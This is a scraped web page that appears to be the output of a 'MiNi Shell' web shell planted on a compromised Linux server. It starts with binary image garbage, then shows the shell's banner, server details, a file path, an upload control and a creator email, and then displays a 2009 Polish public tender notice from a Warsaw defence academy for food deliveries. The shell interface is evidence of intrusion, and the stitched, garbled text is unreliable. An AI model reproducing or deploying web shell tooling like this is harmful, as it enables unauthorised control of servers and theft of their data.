JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090217/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090217/30846-N-2009.html

<p class="kh_header"><b>Warszawa: Dostawa różnych produktów spożywczych</b><br>
<b>Numer ogłoszenia: 30846 - 2009; data zamieszczenia: 17.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Akademia Obrony Narodowej , al. Gen. A. Chruściela 103, 00-910 Warszawa, woj. mazowieckie, tel. 022 6813780, faks 022 6813175.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.aon.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b>  Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa różnych produktów spożywczych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje dostawę różnych produktów spożywczych (produktów zwierzęcych, olejów i tłuszczów roślinnych, produktów wytwarzanych z przemiału ziarna, skrobi i produktów skrobiowych)
1.		Miód naturalny porcjowany po 25 g	PN-88/A-77626	kg	1500
2.		Olej jadalny uniwersalny op. 1 - 2 l.	PN-A-86908	l	4500
3.		Mąka pszenna op. 1,00-2,00 kg	PN-A-74022	kg	4000
4.		Mąka ziemniaczana  op. 1,00-2,00 kg	PN-63/R-64810	kg	40
5.		Kasza manna  op. 1,00-2,00 kg	PN-88/A-74036	kg	250
6.		Kasza gryczana op. 1,00-2,00 kg	PN-A-74204	kg	200
7.		Kasza jęczmienna pęczak op. 1,00-2,00 kg	PN-A-74202	kg	200
8.		Kasza jęczmienna perłowa op. 1,00-2,00 kg	PN-A-74203	kg	200
9.		Płatki owsiane op. 1,00-2,00 kg	PN-82/A-74037	kg	250
10.		Płatki kukurydziane op. 1,00-2,00 kg	pat	kg	250
11.		Płatki śniadaniowe czekoladowe op. 1,00-2,00 kg	pat	kg	250
12.		Musli jabłkowe  op. 1,00-2,00 kg	PN-V-74031	kg	250
13.		Musli truskawkowe op. 1,00-2,00 kg	PN-V-74031	kg	250
14.		Musli morelowe op. 1,00-2,00 kg	PN-V-74031	kg	250
15.		Musli bananowe op. 1,00-2,00 kg	PN-V-74031	kg	250
16.		Cukier biały 1,00-2,00 kg	PN-A-74850	kg	2000
17.		Cukier w kostkach 1,00-2,00 kg	PN-A-74850	kg	1000
18.		Cukier puder 1,00 - 2,00 kg	PN-A-74850	kg	120
19.		Cukier waniliowy		kg	80
20.		Kakao 10-12 % tł. op. 1,00-2,00 kg	PN-A-88103	kg	225
21.		Czekolada pełna gorzka w tabliczkach 100 g 	PN-A-88102	kg	200
22.		Czekolada pełna mleczna tabliczka 100 g 	PN-A-88102	kg	700
23.		Batony czekoladowe pakowane jednostkowo 40 - 60 g.	PN-A-88111	kg	1000
24.		Wafelki w czekoladzie pakowane jednostkowo od 30 do 60 g	PN-A-88112	kg	400
25.		Wafelki w czekoladzie o smaku orzechowym pakowane jednostkowo od 30 do 60 g	PN-A-88112	kg	400
26.		Wafelki w czekoladzie o smaku waniliowym 
pakowane jednostkowo od 30 do 60 g	PN-A-88112	kg	400
27.		Makaron dwujajeczny nitki, paski, kolanka op. 1,00-2,00 kg	PN-V-74005	kg	400
28.		Herbata czarna porcjowana (ekspresowa)	PN-ISO-3720	szt	22500
29.		Herbata czarna luzem	PN-ISO-3720	kg	360
30.		Majonez średniotłuszczowy stołowy op. 1,00-2,00 kg	PN-A-86950	kg	1600
31.		Majonezowy sos sałatkowy op. do 5 kg	PN-A-86950	kg	300
32.		Musztarda popularna sarepska 0,4-0,6 kg	PN-A-86964	kg	200
33.		Musztarda popularna sarepska  4,5-5,5 kg	PN-A-86964	kg	1000
34.		Ocet spirytusowy 10%	PN-EN 13188	ltr.	250
35.		Ocet winny 10%	PN-EN 13188	ltr.	20
36.		Kwasek cytrynowy	PN-81/A-79734	kg	50
37.		Ketchup 0,4-0,6 kg	PN-A-86951	kg	200
38.		Ketchup 4,5-5,5 kg	PN-A-86951	kg	1000
39.		Przyprawa do mięsa	PN-R-87022	kg	80
40.		Przyprawa do ryb	PN-R-87022	kg	10
41.		Przyprawa do drobiu	PN-R-87022	kg	20
42.		Przyprawa do flaków	PN-R-87022	kg	10
43.		Przyprawa uniwersalna	PN-R-87022	kg	100
44.		Żelatyna spożywcza	PN-A-82245	kg	20
45.		Pieprz czarny mielony	PN-A-86965	kg	30
46.		Liść laurowy	PN-R-87011	kg	10
47.		Majeranek	PN-A-86958	kg	10
48.		Papryka mielona	PN-A-86955	kg	20
49.		Ziele angielskie		kg	10
50.		Sól spożywcza jodowana	PN-C-84081	kg	600
51.		Barszcz biały	PN-V-74007	kg	150
52.		Zupa pieczarkowa	PN-V-74007	kg	150
53.		Sos sałatkowy	PN-A-82020	kg	350
54.		Drożdże piekarskie prasowane	PN-A-79002	kg	30
55.		Proszek do pieczenia	PN-A-94017	kg	20
56.		Sok jabłkowy 1l	PN-A-75955	ltr.	1800
57.		Nektar  z czarnej porzeczki op. 1 l	PN-A-75955	ltr.	1800
58.		Sok pomarańczowy op.1 l	PN-A-75951	ltr.	1800
59.		Nektar  grejpfrutowy op. 1 l	PN-A-75951	ltr.	1800
60.		Sok wieloowocowy op.1 l	PN-A-75951	ltr.	1800
61.		Sok (syrop) zagęszczony-koncentrat	PN-A-75966	ltr.	300
62.		Marchew z groszkiem i kukurydza konserwowa po oddzieleniu zalewy op. 1,50 - 3,00 kg	PN-A-77807	kg	700
63.		Marchew z groszkiem konserwowa po oddzieleniu zalewy op. 1,50 - 3,00 kg 	PN-A-77807	kg	200
64.		Groszek konserwowy po oddzieleniu zalewy op. 1,50 - 3,00 kg	PN-A-77803	kg	1600
65.		Seler konserwowy po oddzieleniu zalewy op.  do 1000 g	PN-A-77807	kg	1000
66.		Fasolka konserwowa po oddzieleniu zalewy op. 1,50 - 3,00 kg	PN-A-77802	kg	1600
67.		Fasolka czerwona konserwowa po oddzieleniu zalewy op. 1,50 - 3,00 kg	PN-A-77802	kg	350
68.		Koncentrat pomidorowy 30%  - opakowanie 1kg	PN-V-74009	kg	350
69.		Koncentrat pomidorowy 30% - opakowanie do 4,5kg	PN-V-74009	kg	400
70.		Kukurydza konserwowa po oddzieleniu zalewy op. 1,50 - 3,00 kg	PN-A-77807	kg	2500
71.		Ogórki konserwowe całe po oddzieleniu zalewy op. 1,50 - 3,00 kg	PN-A-77801	kg	3300
72.		Papryka konserwowa po oddzieleniu zalewy op. 1,50 - 3,00 kg	PN-A-77806	kg	2000
73.		Papryka konserwowa paski	PN-A-77806	kg	2000
74.		Cebulki konserwowe	PN-A-77806	kg	50
75.		Czosnek konserwowy	PN-A-77806	kg	50
76.		Sałatka szwedzka  op. szkło lub folia 2,50 - 4,00 kg	PN-A-77750	kg	1100
77.		Sałatka z czerwonej kapusty op. szkło lub folia 2,50 - 4,00 kg	PN-A-77750	kg	800
78.		Sałatka wielowarzywna 5 składnikowa op. szkło lub folia 2,50 - 4,00 kg	PN-A-77750	kg	1600
79.		Chrzan tarty z kw. cytrynowym 0,8-1,2 kg	PN-A-77806	kg	400
80.		Ćwikła z chrzanem op. 0,9-1,5 kg	PN-A-77806	kg	200
81.		Przecier ogórkowy	PN-A-77701	kg	300
82.		Szczaw konserwowy	PN-A-77807	kg	200
83.		Pieczarki konserwowe	PN-A-75503	kg	400
84.		Rodzynki		kg	40
85.		Brzoskwinia konserwowa po oddzieleniu zalewy op.  do 1000 g	PN-A-77610	kg	600
86.		Ananasy konserwowe po oddzieleniu zalewy op.  do 1000 g	PN-A-77610	kg	225
87.		Dżem śliwkowy op. 25 g	PN-A-75100	kg	250
88.		Dżem truskawkowy op. 25 g	PN-A-75100	kg	250
89.		Dżem wiśniowy op. 25 g	PN-A-75100	kg	250
90.		Dżem pomarańczowy op. 25 g	PN-A-75100	kg	250
91.		Dżem brzoskwiniowy op. 25 g	PN-A-75100	kg	250
92.		Dżem śliwkowy op. 1,5-3 kg	PN-A-75100	kg	250
93.		Dżem truskawkowy op. 1,5-3 kg	PN-A-75100	kg	250
94.		Dżem wiśniowy op. 1,5-3  kg	PN-A-75100	kg	250
95.		Dżem pomarańczowy op. 1,5-3 kg	PN-A-75100	kg	250
96.		Dżem brzoskwiniowy op. 1,5-3 kg	PN-A-75100	kg	250
97.		Powidła śliwkowe op. 25 g	PN-93/A-75012	kg	250
98.		Powidła śliwkowe op. 1,5-3 kg	PN-93/A-75012	kg	250
99.		Morele suszone	PN-A-75201	kg	50
100.		Śliwki suszone	PN-A-75201	kg	150
101.		Woda pitna but. 1,5 l gazowana	PN-Z-1101-3	ltr.	7000
102.		Woda pitna but. 1,5 l niegazowana	PN-Z-1101-3	ltr.	7000.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 01.20.00.00-9, 15.30.00.00-1, 15.41.22.00-1, 15.60.00.00-4, 15.80.00.00-6, 15.98.10.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Każda oferta musi być zabezpieczona wadium w wysokości - 6500,00 PLN<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy, 1.posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, z tym, że Wykonawca wykaże że spełnia wymagania określone w ustawie z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia Dz. U. 2006 r., 171, 1225 oraz ustawy z dnia 16 grudnia 2005 roku o produktach pochodzenia zwierzęcego Dz.U. 2006., 17.127, poprzez złożenie - 1)zaświadczenia właściwego miejscowo organu Państwowej Inspekcji Sanitarnej lub Państwowej Inspekcji Weterynaryjnej, że podlega jej stałemu nadzorowi wystawionego nie wcześniej niż 12 miesięcy przed upływem terminu składania ofert, 2)aktualnej decyzji właściwego organu Państwowej Inspekcji Sanitarnej lub Państwowej Inspekcji Weterynaryjnej dotyczącej możliwości produkcji lub obrotu danego produktu spożywczego będącego przedmiotem zamówienia, 3)certyfikatu wydanego przez firmy posiadające akredytację i uprawnienia Polskiego Centrum Akredytacji z siedzibą w Warszawie oraz krajowej organizacji akredytacyjnej dla danego kraju lub zaświadczenia wydanego przez właściwego terytorialnie Powiatowego Inspektora Państwowej Inspekcji Sanitarnej lub aktualnego protokołu z kontroli sanitarnej właściwego organu urzędowej kontroli wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, potwierdzającego stosowanie systemu HACCP. 2.posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, 3.znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, 4.nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust. l i ust. 2 ustawy. Sposób oceny spełniania warunków -Zamawiający uzna, że Wykonawca spełnia warunki udziału w postępowaniu jeżeli będzie to wynikało z oświadczeń i dokumentów złożonych wraz z ofertą. Wykonawca może spełniać albo nie spełniać warunków udziału w postępowaniu, oceny spełniania warunków nie stopniuje się..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> I. Zamawiający żąda złożenia do oferty niżej wymienionych oświadczeń. 1.Oświadczenie o spełnieniu warunków określonych w art. 22 ust. 1 pkt. 1-4 ustawy. II. Zamawiający żąda złożenia do oferty niżej wymienionych dokumentów. 1.Dokumenty potwierdzające, że wykonawca posiada uprawnienia do wykonywania określonej działalności lub czynności, 1)aktualny odpis z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, 2)zaświadczenie właściwego miejscowo organu Państwowej Inspekcji Sanitarnej lub Państwowej Inspekcji Weterynaryjnej, że Wykonawca podlega jej stałemu nadzorowi wystawionego nie wcześniej niż 12 miesięcy przed upływem terminu składania ofert, 3)aktualna decyzja właściwego organu Państwowej Inspekcji Sanitarnej lub Państwowej Inspekcji Weterynaryjnej dotycząca możliwości produkcji lub obrotu danego produktu spożywczego będącego przedmiotem zamówienia, 4)certyfikat wydany przez firmy posiadające akredytację i uprawnienia Polskiego Centrum Akredytacji z siedzibą w Warszawie oraz krajowej organizacji akredytacyjnej dla danego kraju lub aktualne zaświadczenie wydane przez właściwego terytorialnie Powiatowego Inspektora Państwowej Inspekcji Sanitarnej lub aktualny protokół z kontroli sanitarnej właściwego organu urzędowej kontroli wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, potwierdzającego stosowanie systemu HACCP. 2.Dokumenty potwierdzające, że wykonawca nie podlega wykluczeniu z udziału w postępowaniu. 1)aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust.1 pkt 4-8 ustawy, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, 2)aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, III.Wykonawca zagraniczny 1)Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej zamiast dokumentów, o których mowa w dziale II, -ust. 1 pkt 1, ust. 2 pkt 2 składa dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że a)nie otwarto jego likwidacji ani nie ogłoszono upadłości, b)nie orzeczono wobec niego zakazu ubiegania się o zamówienie, -ust. 2 pkt 1 składa zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy Prawo zamówień publicznych. 2)Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania - nie wydaje się dokumentów, o których mowa w pkt 1 zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. 3)Dokumenty, o których mowa w pkt 1 oraz w pkt 2, powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. IV.Wspólny udział wykonawców 1.Dokumenty i oświadczenia, które muszą być złożone przez każdego z Wykonawców występujących wspólnie. 1)Oświadczenie wymienione w dziale I ust. 1, 2)Dokumenty wymieniony w dziale II, ust. 1 pkt 1, ust. 2 pkt 1, 2, 2.Dokumenty i oświadczenia, które będą sumaryczną danych wszystkich wykonawców występujących wspólnie. 1)Dokument pełnomocnictwa wyznaczający pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. 2)Dokumenty wymienione w dziale II, ust. 1 pkt 2, 3, 4..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.aon.edu.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Adres jak na wstępie, budynek nr 4 pokój 129. Koszt SIWZ - 10 PLN. SIWZ pobrana ze strony internetowej Zamawiającego jest bezpłatna...</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.02.2009 godzina 10:30, miejsce: Oferty należy składać w siedzibie Zamawiającego, adres jak na wstępie w Kancelarii Jawnej AON - budynek nr 4 - pokój nr 115 (I piętro) do dnia 26.02. 2009 r. do godz. 10:30.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com